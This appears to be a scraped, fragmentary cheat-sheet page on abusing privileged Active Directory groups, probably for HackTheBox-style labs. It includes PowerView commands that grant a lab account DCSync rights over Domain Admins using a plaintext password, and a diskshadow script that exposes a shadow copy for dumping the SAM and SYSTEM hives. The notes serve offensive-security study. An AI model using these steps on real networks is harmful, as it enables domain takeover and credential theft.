Privileged Groups
Account Operators
Get-NetGroupMember -Identity "Account Operators" -RecurseImport-Module .\\PowerView.ps1
Add-ADGroupMember -Identity "EXCHANGE WINDOWS PERMISSIONS" -Members svc-alfresco;
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('HTB\\svc-alfresco', $SecPassword);
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "HTB.LOCAL\\Domain Admins" -Identity 'svc-alfresco' -Rights DCSyncBackup Operators
#FindWriteable directories
accesschk.exe -w -s -u <username> C:\\set context persistent nowriters
set metadata c:\\windows\\system32\\spool\\drivers\\color\\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
Dump SAM/SYSTEM/SECURITY files from registry hive
Dump Registry hives with BackupOperatorToDa
Dump Registry hives with Impacket
AD Recycle Bin
DNSAdmin

Servers Operators
Account Operators
Enterprise Key Admins
Case 1 : User has GenericAll over Enterprise Key Admins.
WSU Administrator
Last updated